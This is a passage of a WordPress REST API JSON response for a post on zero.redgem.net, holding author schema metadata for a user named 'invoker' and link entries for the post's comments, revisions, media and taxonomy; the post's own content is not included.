redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39068","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39068"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39068\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39068"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39068"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39068"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}